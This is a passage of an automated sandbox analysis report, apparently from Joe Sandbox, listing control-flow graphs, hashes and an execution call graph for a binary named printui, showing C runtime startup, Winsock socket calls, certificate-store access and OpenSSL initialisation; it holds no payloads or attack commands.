                                                                                            control_flow_graph 27 7ff63f421570-7ff63f4215ac GetStartupInfoW 28 7ff63f4215af-7ff63f4215ba 27->28 29 7ff63f4215d7 28->29 30 7ff63f4215bc-7ff63f4215bf 28->30 33 7ff63f4215dc-7ff63f4215e4 29->33 31 7ff63f4215ca-7ff63f4215d5 Sleep 30->31 32 7ff63f4215c1-7ff63f4215c8 30->32 31->28 32->33 34 7ff63f4215e6-7ff63f4215f2 _amsg_exit 33->34 35 7ff63f4215f4-7ff63f4215fc 33->35 36 7ff63f421660-7ff63f421668 34->36 37 7ff63f4215fe-7ff63f42161a 35->37 38 7ff63f421655 35->38 40 7ff63f421687-7ff63f421689 36->40 41 7ff63f42166a-7ff63f42167d _initterm 36->41 42 7ff63f42161e-7ff63f421621 37->42 39 7ff63f42165b 38->39 39->36 43 7ff63f42168b-7ff63f42168e 40->43 44 7ff63f421695-7ff63f42169c 40->44 41->40 45 7ff63f421647-7ff63f421649 42->45 46 7ff63f421623-7ff63f421625 42->46 43->44 48 7ff63f4216c8-7ff63f4216d5 44->48 49 7ff63f42169e-7ff63f4216ac call 7ff63f4219c0 44->49 45->39 47 7ff63f42164b-7ff63f421650 45->47 46->47 50 7ff63f421627-7ff63f42162a 46->50 53 7ff63f4217b6-7ff63f4217d3 47->53 51 7ff63f4216d7-7ff63f4216dc 48->51 52 7ff63f4216e1-7ff63f4216e6 48->52 49->48 62 7ff63f4216ae-7ff63f4216be 49->62 55 7ff63f42163c-7ff63f421645 50->55 56 7ff63f42162c-7ff63f421638 50->56 51->53 57 7ff63f4216ea-7ff63f4216f1 52->57 55->42 56->55 60 7ff63f421767-7ff63f42176b 57->60 61 7ff63f4216f3-7ff63f4216f6 57->61 63 7ff63f42177b-7ff63f421784 60->63 64 7ff63f42176d-7ff63f421777 60->64 65 7ff63f4216f8-7ff63f4216fa 61->65 66 7ff63f4216fc-7ff63f421702 61->66 62->48 63->53 63->57 64->63 65->60 65->66 67 7ff63f421712-7ff63f421746 call 7ff63f4210e0 66->67 68 7ff63f421704-7ff63f421710 66->68 71 7ff63f421748-7ff63f42174a exit 67->71 72 7ff63f421750-7ff63f421757 67->72 68->66 71->72 73 7ff63f421759-7ff63f42175f _cexit 72->73 74 7ff63f421765 72->74 73->74 74->53
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2552580244.00007FF63F421000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63F420000, based on PE: true
                                                                                            • Associated: 0000001B.00000002.2552554419.00007FF63F420000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.2552606972.00007FF63F422000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.2552632237.00007FF63F424000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_27_2_7ff63f420000_printui.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_cexit_inittermexit
                                                                                            • String ID:
                                                                                            • API String ID: 642454821-0
                                                                                            • Opcode ID: d036f23a73c2ceeb0dc0bbf8eea258f05a7f4c7e4edc28ade6a86160fbf4be78
                                                                                            • Instruction ID: f8084711b117ef1393431087eb47b2af3cc2f574408e91d5827a7f5f0d9bb590
                                                                                            • Opcode Fuzzy Hash: d036f23a73c2ceeb0dc0bbf8eea258f05a7f4c7e4edc28ade6a86160fbf4be78
                                                                                            • Instruction Fuzzy Hash: A3613825A08646A2F7689B11E54063933A1FF94B84F564135DA4DD33A7EF3FE981E700
                                                                                            Function 00007FF63F421520 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 75 7ff63f421520-7ff63f421568 __wgetmainargs
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2552580244.00007FF63F421000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63F420000, based on PE: true
                                                                                            • Associated: 0000001B.00000002.2552554419.00007FF63F420000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.2552606972.00007FF63F422000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.2552632237.00007FF63F424000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_27_2_7ff63f420000_printui.jbxd
                                                                                            Similarity
                                                                                            • API ID: __wgetmainargs
                                                                                            • String ID:
                                                                                            • API String ID: 1709950718-0
                                                                                            • Opcode ID: fb17b9cf0bb6e0d9112bc9002bd240893ebb992b9e28e092c31673401121c9b0
                                                                                            • Instruction ID: 6771286895df8d00f48c75d9af292fd4d667410646f8a41d7b1cd9f018eb0a42
                                                                                            • Opcode Fuzzy Hash: fb17b9cf0bb6e0d9112bc9002bd240893ebb992b9e28e092c31673401121c9b0
                                                                                            • Instruction Fuzzy Hash: 2EE07574E09647F6EA18CB10E8405B47770BB05744F820032C50DD332BFE3EA209EB24

                                                                                            Non-executed Functions

                                                                                            Function 00007FF63F421B5C Relevance: 4.5, APIs: 3, Instructions: 13COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2552580244.00007FF63F421000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63F420000, based on PE: true
                                                                                            • Associated: 0000001B.00000002.2552554419.00007FF63F420000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.2552606972.00007FF63F422000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.2552632237.00007FF63F424000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_27_2_7ff63f420000_printui.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled$CurrentProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1249254920-0
                                                                                            • Opcode ID: 67a69430592ab0ed5dfc45027a236bc3dcce14c44e9d99ca36710f20fe33c88e
                                                                                            • Instruction ID: 8c7a4c2c3aee81f9b0e3b3369100e02693b338bef424c7b9402ae5663793add4
                                                                                            • Opcode Fuzzy Hash: 67a69430592ab0ed5dfc45027a236bc3dcce14c44e9d99ca36710f20fe33c88e
                                                                                            • Instruction Fuzzy Hash: E7D0C965E08A0B96FB5C1B62AC158351320BF5CB45F171034CB2BC6363DD7E9686A300
                                                                                            Function 00007FF63F421880 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 150 7ff63f421880-7ff63f421897 SetUnhandledExceptionFilter
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2552580244.00007FF63F421000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63F420000, based on PE: true
                                                                                            • Associated: 0000001B.00000002.2552554419.00007FF63F420000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.2552606972.00007FF63F422000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.2552632237.00007FF63F424000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_27_2_7ff63f420000_printui.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                            • String ID:
                                                                                            • API String ID: 3192549508-0
                                                                                            • Opcode ID: 485700f28bb7499bc39e10582eb089dbe9317f5a288f74151dbe7ec09ee2bb63
                                                                                            • Instruction ID: 20b72fe0d2055bbc0e989bf6976da139502f6a31cf9524fa8a7efebd1c7734f8
                                                                                            • Opcode Fuzzy Hash: 485700f28bb7499bc39e10582eb089dbe9317f5a288f74151dbe7ec09ee2bb63
                                                                                            • Instruction Fuzzy Hash: 1CB09214E25402E1E608AB219C950A113A07F98300FC20430C10DC1222DE1E929A9700
                                                                                            Function 00007FF63F421A54 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2552580244.00007FF63F421000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63F420000, based on PE: true
                                                                                            • Associated: 0000001B.00000002.2552554419.00007FF63F420000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.2552606972.00007FF63F422000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.2552632237.00007FF63F424000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_27_2_7ff63f420000_printui.jbxd
                                                                                            Similarity
                                                                                            • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                            • String ID:
                                                                                            • API String ID: 4104442557-0
                                                                                            • Opcode ID: 620f975a63dfef7962d64ab17e7f439f8fad081d60c42cdb74dd755226332b19
                                                                                            • Instruction ID: ae31891d86d4e7d5ef9aee78a152944218d0c4a1a8e033ed941a026b50ee1182
                                                                                            • Opcode Fuzzy Hash: 620f975a63dfef7962d64ab17e7f439f8fad081d60c42cdb74dd755226332b19
                                                                                            • Instruction Fuzzy Hash: ED115C22A04B459AEB04DF60EC442B833A4FB48758F410A31EA6DC775AEF7DD6A48340

                                                                                            Execution Graph

                                                                                            Execution Coverage:1.6%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:20%
                                                                                            Total number of Nodes:1583
                                                                                            Total number of Limit Nodes:49
                                                                                            execution_graph 104716 7ffda373ade0 104717 7ffda373ae07 104716->104717 104721 7ffda373ae19 104716->104721 104718 7ffda373aed1 calloc 104719 7ffda373b156 104718->104719 104723 7ffda373aef6 104718->104723 104720 7ffda373b15b free free 104719->104720 104722 7ffda373aea3 104720->104722 104721->104718 104721->104722 104723->104720 104723->104721 104724 7ffda3746740 104725 7ffda374674f 104724->104725 104727 7ffda374675b 104724->104727 104726 7ffda3746774 104727->104726 104730 7ffda37467b2 104727->104730 104732 7ffda3764470 calloc 104727->104732 104729 7ffda37467ba 104730->104729 104740 7ffda37654c0 104730->104740 104733 7ffda37644a7 104732->104733 104737 7ffda376453e 104732->104737 104743 7ffda373a4c0 104733->104743 104735 7ffda37644f6 104736 7ffda376451b WSACreateEvent 104735->104736 104738 7ffda3764543 104735->104738 104736->104737 104736->104738 104737->104730 104739 7ffda376459f free 104738->104739 104739->104737 104795 7ffda377f210 104740->104795 104742 7ffda37654ea 104742->104730 104746 7ffda3746560 AcquireSRWLockExclusive 104743->104746 104745 7ffda373a4d4 104745->104735 104747 7ffda374659e ReleaseSRWLockExclusive 104746->104747 104748 7ffda374657a 104746->104748 104754 7ffda3781d10 calloc 104747->104754 104761 7ffda3746e20 104748->104761 104751 7ffda3746586 104751->104747 104753 7ffda374658a ReleaseSRWLockExclusive 104751->104753 104752 7ffda37465b5 104752->104745 104753->104745 104755 7ffda3781d36 104754->104755 104757 7ffda3781d47 104754->104757 104755->104752 104756 7ffda3781d90 free 104760 7ffda3781e8e 104756->104760 104757->104756 104758 7ffda3781d7e 104757->104758 104759 7ffda3781d9d __acrt_iob_func __acrt_iob_func __acrt_iob_func 104757->104759 104758->104756 104759->104760 104760->104752 104762 7ffda3746e42 104761->104762 104764 7ffda3746eb3 104761->104764 104763 7ffda3746e46 calloc 104762->104763 104765 7ffda3746e9a 104762->104765 104763->104765 104764->104751 104765->104764 104767 7ffda377b470 104765->104767 104768 7ffda377b48e WSAStartup 104767->104768 104769 7ffda377b4d6 104767->104769 104770 7ffda377b4a2 104768->104770 104771 7ffda377b4b9 104768->104771 104773 7ffda377b4e3 GetModuleHandleW 104769->104773 104774 7ffda377b76c 104769->104774 104770->104769 104772 7ffda377b4b3 WSACleanup 104770->104772 104771->104764 104772->104771 104775 7ffda377b512 104773->104775 104776 7ffda377b51e GetProcAddress wcspbrk 104773->104776 104774->104764 104777 7ffda377b69e GetModuleHandleA 104775->104777 104778 7ffda377b57d 104776->104778 104779 7ffda377b555 104776->104779 104780 7ffda377b6c3 GetProcAddress GetProcAddress GetProcAddress 104777->104780 104790 7ffda377b708 104777->104790 104782 7ffda377b582 GetProcAddress 104778->104782 104783 7ffda377b5ac GetSystemDirectoryW 104778->104783 104781 7ffda377b56f LoadLibraryW 104779->104781 104786 7ffda377b55d 104779->104786 104780->104790 104781->104786 104782->104783 104784 7ffda377b597 LoadLibraryExW 104782->104784 104785 7ffda377b5c9 malloc 104783->104785 104783->104786 104784->104786 104788 7ffda377b5e2 GetSystemDirectoryW 104785->104788 104789 7ffda377b65d free 104785->104789 104786->104777 104787 7ffda377b682 GetProcAddress 104786->104787 104787->104775 104787->104777 104788->104789 104792 7ffda377b5f2 104788->104792 104789->104786 104791 7ffda377b74c QueryPerformanceFrequency 104790->104791 104791->104774 104793 7ffda377b654 LoadLibraryW 104792->104793 104794 7ffda377b648 104792->104794 104793->104794 104794->104789 104796 7ffda377f222 QueryPerformanceCounter 104795->104796 104797 7ffda377f25d GetTickCount 104795->104797 104796->104742 104797->104742 104798 7ffda3736540 104799 7ffda373657e 104798->104799 104802 7ffda3736583 104798->104802 104799->104802 104803 7ffda3736602 104799->104803 104816 7ffda3737ee0 104799->104816 104801 7ffda37365a4 104801->104802 104805 7ffda37365ee WSAGetLastError 104801->104805 104806 7ffda37365d6 connect 104801->104806 104815 7ffda3736637 104801->104815 104803->104802 104804 7ffda3736770 104803->104804 104809 7ffda373674a 104803->104809 104803->104815 104845 7ffda37387e0 SleepEx getsockopt 104804->104845 104805->104803 104806->104805 104808 7ffda3736667 WSASetLastError 104848 7ffda377a280 13 API calls 104808->104848 104812 7ffda37387e0 3 API calls 104809->104812 104809->104815 104812->104815 104813 7ffda373678b 104814 7ffda377f210 2 API calls 104813->104814 104814->104802 104815->104802 104815->104808 104817 7ffda377f210 2 API calls 104816->104817 104818 7ffda3737f1f 104817->104818 104849 7ffda3738740 104818->104849 104820 7ffda3738364 closesocket 104827 7ffda3737fe0 104820->104827 104821 7ffda3737f3f 104822 7ffda3737f9b 104821->104822 104823 7ffda3737f6b _errno _errno _errno 104821->104823 104824 7ffda3738009 104821->104824 104822->104820 104822->104827 104852 7ffda377a280 13 API calls 104823->104852 104826 7ffda3738019 setsockopt 104824->104826 104828 7ffda3738047 104824->104828 104826->104828 104827->104801 104829 7ffda3738082 setsockopt 104828->104829 104836 7ffda37380c6 104828->104836 104830 7ffda37380af WSAGetLastError 104829->104830 104829->104836 104853 7ffda377a280 13 API calls 104830->104853 104831 7ffda3738140 getsockopt 104834 7ffda3738171 setsockopt 104831->104834 104835 7ffda3738167 104831->104835 104832 7ffda3738123 104837 7ffda37381b0 setsockopt 104832->104837 104842 7ffda3738275 104832->104842 104834->104832 104835->104832 104835->104834 104836->104831 104836->104832 104838 7ffda37381e0 WSAGetLastError 104837->104838 104839 7ffda37381f2 104837->104839 104838->104842 104840 7ffda373821e WSAIoctl 104839->104840 104841 7ffda3738268 WSAGetLastError 104840->104841 104840->104842 104841->104842 104842->104822 104843 7ffda373831a 104842->104843 104843->104827 104844 7ffda377f210 2 API calls 104843->104844 104844->104827 104846 7ffda3738831 WSAGetLastError 104845->104846 104847 7ffda3736783 104845->104847 104846->104847 104847->104813 104847->104815 104848->104802 104850 7ffda373878a socket 104849->104850 104851 7ffda3738762 104849->104851 104850->104851 104851->104821 104852->104822 104853->104836 104854 7ffda3732360 104855 7ffda37323a8 104854->104855 104859 7ffda37323ad 104854->104859 104862 7ffda3751460 104855->104862 104857 7ffda377f210 2 API calls 104858 7ffda37323fb 104857->104858 104867 7ffda3732b20 calloc 104858->104867 104859->104857 104861 7ffda3732416 104863 7ffda37514b0 socket 104862->104863 104866 7ffda375146e 104862->104866 104864 7ffda37514c9 104863->104864 104865 7ffda37514d6 closesocket 104863->104865 104864->104859 104865->104859 104866->104859 104868 7ffda3732b7e memset malloc 104867->104868 104869 7ffda3732cd5 _errno 104867->104869 104870 7ffda3732c37 104868->104870 104871 7ffda3732c08 InitializeCriticalSectionEx 104868->104871 104875 7ffda3732ce0 104869->104875 104873 7ffda3732c6b 104870->104873 104874 7ffda3732c5a closesocket 104870->104874 104905 7ffda3776b40 socket 104871->104905 104877 7ffda3732c84 free 104873->104877 104878 7ffda3732c74 DeleteCriticalSection free 104873->104878 104874->104873 104875->104861 104876 7ffda3732c2f 104876->104870 104879 7ffda3732d0b _strdup 104876->104879 104880 7ffda3732c9d 104877->104880 104878->104877 104879->104870 104881 7ffda3732d2b free _strdup 104879->104881 104882 7ffda3732caf closesocket 104880->104882 104883 7ffda3732cb5 memset free 104880->104883 104886 7ffda3732d51 104881->104886 104903 7ffda3732e31 104881->104903 104882->104883 104883->104869 104884 7ffda3732fa4 free 104884->104869 104885 7ffda3732e4b EnterCriticalSection LeaveCriticalSection 104888 7ffda3732e8e 104885->104888 104889 7ffda3732f41 104885->104889 104887 7ffda3732f06 104886->104887 104895 7ffda3732d8c MultiByteToWideChar 104886->104895 104887->104875 104896 7ffda3732f1e _errno 104887->104896 104890 7ffda3732e97 CloseHandle 104888->104890 104891 7ffda3732f36 CloseHandle 104888->104891 104892 7ffda3732f67 104889->104892 104893 7ffda3732f46 GetAddrInfoExCancel WaitForSingleObject CloseHandle 104889->104893 104894 7ffda3732f8d 104890->104894 104891->104894 104898 7ffda3732f80 free 104892->104898 104893->104892 104899 7ffda3732f98 closesocket 104894->104899 104895->104887 104897 7ffda3732dbe MultiByteToWideChar 104895->104897 104896->104903 104897->104887 104900 7ffda3732def 104897->104900 104898->104894 104899->104884 104929 7ffda37333f0 104900->104929 104902 7ffda3732e08 CreateEventW 104902->104903 104904 7ffda3732ea5 GetAddrInfoExW 104902->104904 104903->104884 104903->104885 104904->104875 104906 7ffda3776b90 htonl setsockopt 104905->104906 104910 7ffda3776b8b 104905->104910 104907 7ffda3776db2 closesocket closesocket closesocket 104906->104907 104908 7ffda3776c15 bind 104906->104908 104907->104910 104908->104907 104909 7ffda3776c31 getsockname 104908->104909 104909->104907 104911 7ffda3776c4b 104909->104911 104910->104876 104911->104907 104912 7ffda3776c55 listen 104911->104912 104912->104907 104913 7ffda3776c6c socket 104912->104913 104913->104907 104914 7ffda3776c89 connect 104913->104914 104914->104907 104915 7ffda3776ca5 104914->104915 104915->104907 104916 7ffda3776cd9 accept 104915->104916 104916->104907 104917 7ffda3776cf5 104916->104917 104918 7ffda377f210 2 API calls 104917->104918 104919 7ffda3776cfe 104918->104919 104932 7ffda376c300 BCryptGenRandom 104919->104932 104921 7ffda3776d18 104921->104907 104922 7ffda3776d20 send 104921->104922 104927 7ffda3776d33 104922->104927 104923 7ffda3776d56 recv 104924 7ffda3776d76 WSAGetLastError 104923->104924 104923->104927 104925 7ffda377f210 2 API calls 104924->104925 104925->104927 104926 7ffda3776e21 104926->104907 104928 7ffda3776e38 closesocket 104926->104928 104927->104907 104927->104923 104927->104926 104928->104910 104930 7ffda3732860 104929->104930 104931 7ffda3733415 __stdio_common_vswprintf 104930->104931 104931->104902 104932->104921 104933 7ffda378ba86 104939 7ffda378ba8e 104933->104939 104934 7ffda378befb calloc 104935 7ffda378bf1c 104934->104935 104936 7ffda378c202 104934->104936 104941 7ffda378bf35 CertFreeCertificateContext 104935->104941 104942 7ffda378bf3b 104935->104942 105008 7ffda378c649 104936->105008 105018 7ffda378c243 104936->105018 104937 7ffda378bf55 104945 7ffda378bf78 free 104937->104945 104946 7ffda378bf83 104937->104946 104938 7ffda378bba3 wcschr 104944 7ffda378bbbc wcsncmp 104938->104944 104967 7ffda378bd18 104938->104967 104939->104934 104939->104938 104943 7ffda378bb71 104939->104943 105012 7ffda378bb86 104939->105012 104940 7ffda378bdbc CertOpenStore 104947 7ffda378be4b free CryptStringToBinaryW 104940->104947 104948 7ffda378bde4 104940->104948 104941->104942 104949 7ffda378bf40 CertCloseStore 104942->104949 104942->105012 104943->104937 104943->104940 104970 7ffda378bd76 104943->104970 104950 7ffda378bbe7 wcsncmp 104944->104950 104951 7ffda378bbdc wcschr 104944->104951 104945->104946 104954 7ffda378bf8c fseek 104946->104954 104984 7ffda378c065 104946->104984 104955 7ffda378bea8 CertFindCertificateInStore 104947->104955 104956 7ffda378be91 104947->104956 104961 7ffda378bde9 GetLastError 104948->104961 104949->105012 104950->104951 104953 7ffda378bc09 wcsncmp 104950->104953 104962 7ffda378bcda 104951->104962 104951->104967 104953->104951 104958 7ffda378bc2b wcsncmp 104953->104958 104959 7ffda378bfac ftell 104954->104959 104960 7ffda378bffd 104954->104960 104965 7ffda378bee5 104955->104965 104966 7ffda378bed7 free 104955->104966 104963 7ffda378be9a free 104956->104963 104964 7ffda378c1ed CertCloseStore 104956->104964 104957 7ffda378c8e0 104975 7ffda378c8fb free 104957->104975 104958->104951 104971 7ffda378bc4a wcsncmp 104958->104971 104959->104960 104972 7ffda378bfbb 104959->104972 104960->104972 104974 7ffda378c002 fseek 104960->104974 104973 7ffda37430a0 104961->104973 104962->104967 104995 7ffda378bcf6 _wcsdup 104962->104995 104963->104964 104964->105012 104965->104964 104977 7ffda378beee 104965->104977 104966->104965 104967->104943 104967->104957 104968 7ffda378c6cb strtol 104969 7ffda378c6e1 strchr 104968->104969 104968->105008 104969->105008 104994 7ffda378be38 free 104970->104994 104970->105012 104971->104951 104980 7ffda378bc69 wcsncmp 104971->104980 104990 7ffda378bfcc fread 104972->104990 104991 7ffda378c02e fclose 104972->104991 104981 7ffda378be18 free 104973->104981 104974->104972 104982 7ffda378c01a malloc 104974->104982 104975->105012 104976 7ffda378c099 malloc 104985 7ffda378c149 104976->104985 104986 7ffda378c0b3 104976->104986 104977->104934 104978 7ffda378c879 CertFreeCertificateContext 104979 7ffda378c87f 104978->104979 104979->105012 105024 7ffda3779b00 GetLastError _errno 104979->105024 104980->104951 104992 7ffda378bc88 wcsncmp 104980->104992 104981->104970 104993 7ffda378be26 free 104981->104993 104982->104972 104983 7ffda378c7b4 strchr 104983->105008 105009 7ffda378c469 104983->105009 104984->104976 104984->104984 104988 7ffda378c157 104985->104988 104989 7ffda378c14e free 104985->104989 104996 7ffda378c0b8 MultiByteToWideChar 104986->104996 105014 7ffda378c0ea 104986->105014 104987 7ffda378c322 strchr 104987->105018 104999 7ffda378c160 GetLastError 104988->104999 105000 7ffda378c1a2 CertFindCertificateInStore 104988->105000 104989->104988 104990->104991 105001 7ffda378bfe6 fclose 104990->105001 105003 7ffda378c037 104991->105003 104992->104951 105002 7ffda378bca7 wcsncmp 104992->105002 104993->104970 104994->105012 104995->104940 104995->104967 104996->105014 104998 7ffda378c76c strncmp 105007 7ffda378c786 strncmp 104998->105007 104998->105008 105010 7ffda378c173 104999->105010 105000->104977 105006 7ffda378c1d0 GetLastError 105000->105006 105001->105003 105005 7ffda378bff4 105001->105005 105002->104951 105002->104967 105013 7ffda378c052 free 105003->105013 105004 7ffda378c894 105017 7ffda378c8a8 free 105004->105017 105005->104984 105011 7ffda37430a0 105006->105011 105007->105008 105007->105012 105008->104968 105008->104983 105008->104998 105008->105009 105008->105012 105020 7ffda378c735 strncmp 105008->105020 105009->104978 105009->104979 105009->105012 105010->105012 105011->104964 105013->105012 105021 7ffda378c136 PFXImportCertStore free 105014->105021 105015 7ffda378c35a strncmp 105015->105018 105016 7ffda378c386 strncmp 105016->105018 105017->105012 105018->104987 105018->105009 105018->105012 105018->105015 105018->105016 105019 7ffda378c3b7 strncmp 105018->105019 105022 7ffda378c3eb strncmp 105018->105022 105023 7ffda378c41f strncmp 105018->105023 105019->105018 105020->105008 105021->104985 105022->105018 105023->105012 105023->105018 105025 7ffda3779b40 105024->105025 105027 7ffda3779b47 105024->105027 105025->105004 105031 7ffda3779ba1 105027->105031 105033 7ffda377abe0 105027->105033 105028 7ffda377a03b _errno 105029 7ffda377a04e _errno 105028->105029 105030 7ffda377a057 GetLastError 105028->105030 105029->105030 105030->105025 105032 7ffda377a062 SetLastError 105030->105032 105031->105028 105032->105025 105034 7ffda377ac0e FormatMessageW 105033->105034 105038 7ffda377ac07 105033->105038 105035 7ffda377ac6f strchr 105034->105035 105036 7ffda377ac4e wcstombs 105034->105036 105035->105038 105037 7ffda377ac66 105036->105037 105037->105035 105038->105031 105039 7ffda36142d0 105040 7ffda36142da 105039->105040 105041 7ffda3614320 ERR_new ERR_set_debug ERR_set_error 105040->105041 105042 7ffda3614355 105040->105042 105119 7ffda3614840 105041->105119 105120 7ffda3612f50 105042->105120 105044 7ffda361436b 105044->105119 105132 7ffda360bff0 105044->105132 105047 7ffda36143a3 CRYPTO_zalloc 105050 7ffda36143c6 CRYPTO_THREAD_lock_new 105047->105050 105047->105119 105048 7ffda361437c ERR_new ERR_set_debug 105049 7ffda3614867 ERR_set_error 105048->105049 105053 7ffda3614873 105049->105053 105051 7ffda36143e1 ERR_new 105050->105051 105052 7ffda3614408 105050->105052 105054 7ffda36143eb ERR_set_debug 105051->105054 105055 7ffda3614410 CRYPTO_strdup 105052->105055 105056 7ffda3614435 OPENSSL_LH_new OPENSSL_LH_set_thunks 105052->105056 105267 7ffda3613a70 89 API calls 105053->105267 105054->105049 105055->105053 105055->105056 105059 7ffda36144ca X509_STORE_new 105056->105059 105060 7ffda36144bb ERR_new 105056->105060 105061 7ffda36144ff 105059->105061 105062 7ffda36144d8 ERR_new ERR_set_debug 105059->105062 105060->105054 105063 7ffda361453d 105061->105063 105064 7ffda3614516 ERR_new ERR_set_debug 105061->105064 105062->105049 105136 7ffda3610eb0 105063->105136 105064->105049 105066 7ffda3614545 105067 7ffda3614570 105066->105067 105068 7ffda3614549 ERR_new 105066->105068 105174 7ffda3629f30 105067->105174 105069 7ffda3614553 ERR_set_debug 105068->105069 105069->105049 105072 7ffda3614588 105183 7ffda362a030 105072->105183 105073 7ffda361457c ERR_new 105073->105069 105075 7ffda3614590 105076 7ffda36145a0 105075->105076 105077 7ffda3614594 ERR_new 105075->105077 105192 7ffda362a8b0 105076->105192 105077->105069 105079 7ffda36145a8 105080 7ffda36145b8 105079->105080 105081 7ffda36145ac ERR_new 105079->105081 105210 7ffda360e900 105080->105210 105081->105069 105084 7ffda36145db 105216 7ffda360d360 105084->105216 105085 7ffda36145cc ERR_new 105085->105069 105087 7ffda36145eb 105088 7ffda3614609 105087->105088 105089 7ffda36145fa ERR_new 105087->105089 105223 7ffda36102b0 105088->105223 105089->105069 105092 7ffda3614845 ERR_new ERR_set_debug 105092->105049 105093 7ffda3614635 OPENSSL_sk_num 105093->105092 105094 7ffda3614646 105093->105094 105095 7ffda3614666 105094->105095 105096 7ffda3614657 ERR_new 105094->105096 105259 7ffda361ef20 105095->105259 105096->105095 105099 7ffda361ef20 5 API calls 105100 7ffda361468d OPENSSL_sk_new_null 105099->105100 105101 7ffda36146b4 OPENSSL_sk_new_null 105100->105101 105102 7ffda36146a5 ERR_new 105100->105102 105103 7ffda36146d4 CRYPTO_new_ex_data 105101->105103 105104 7ffda36146c5 ERR_new 105101->105104 105102->105101 105105 7ffda36146ec ERR_new 105103->105105 105106 7ffda36146fb 105103->105106 105104->105103 105105->105106 105106->105053 105107 7ffda361473b RAND_bytes_ex 105106->105107 105265 7ffda360e880 CRYPTO_THREAD_run_once 105106->105265 105109 7ffda36147a3 105107->105109 105110 7ffda361476b RAND_priv_bytes_ex 105107->105110 105111 7ffda36147ae RAND_priv_bytes_ex 105109->105111 105110->105109 105113 7ffda3614785 RAND_priv_bytes_ex 105110->105113 105114 7ffda36147c8 ERR_new ERR_set_debug 105111->105114 105115 7ffda36147ec 105111->105115 105112 7ffda3614734 105112->105107 105113->105109 105113->105111 105114->105049 105116 7ffda3614807 105115->105116 105117 7ffda36147f8 ERR_new 105115->105117 105266 7ffda36204f0 70 API calls 105116->105266 105117->105116 105121 7ffda3612f60 105120->105121 105122 7ffda3612fba 105121->105122 105123 7ffda3612f6c 105121->105123 105124 7ffda3612fad 105122->105124 105126 7ffda3612fd9 CRYPTO_THREAD_run_once 105122->105126 105123->105124 105125 7ffda3612f75 ERR_new ERR_set_debug ERR_set_error 105123->105125 105124->105044 105125->105124 105126->105124 105127 7ffda3612ffd 105126->105127 105128 7ffda3613004 CRYPTO_THREAD_run_once 105127->105128 105129 7ffda3613026 105127->105129 105128->105124 105128->105129 105130 7ffda361302d CRYPTO_THREAD_run_once 105129->105130 105131 7ffda361305e 105129->105131 105130->105044 105131->105044 105268 7ffda368edf0 105132->105268 105135 7ffda360c024 105135->105047 105135->105048 105138 7ffda3610ec9 105136->105138 105140 7ffda3610f24 105138->105140 105270 7ffda361ee40 105138->105270 105139 7ffda361ef20 5 API calls 105139->105140 105140->105139 105141 7ffda3610f65 EVP_MD_get_size 105140->105141 105143 7ffda3610f8b ERR_set_mark EVP_SIGNATURE_fetch 105140->105143 105141->105140 105142 7ffda36113ae 105141->105142 105142->105066 105144 7ffda3610fb2 105143->105144 105145 7ffda3610fc3 EVP_KEYEXCH_fetch 105144->105145 105146 7ffda3610fde 105145->105146 105147 7ffda3610ff2 EVP_KEYEXCH_fetch 105146->105147 105148 7ffda361100d 105147->105148 105149 7ffda3611019 EVP_KEYEXCH_free 105147->105149 105150 7ffda3611021 EVP_SIGNATURE_fetch 105148->105150 105149->105150 105151 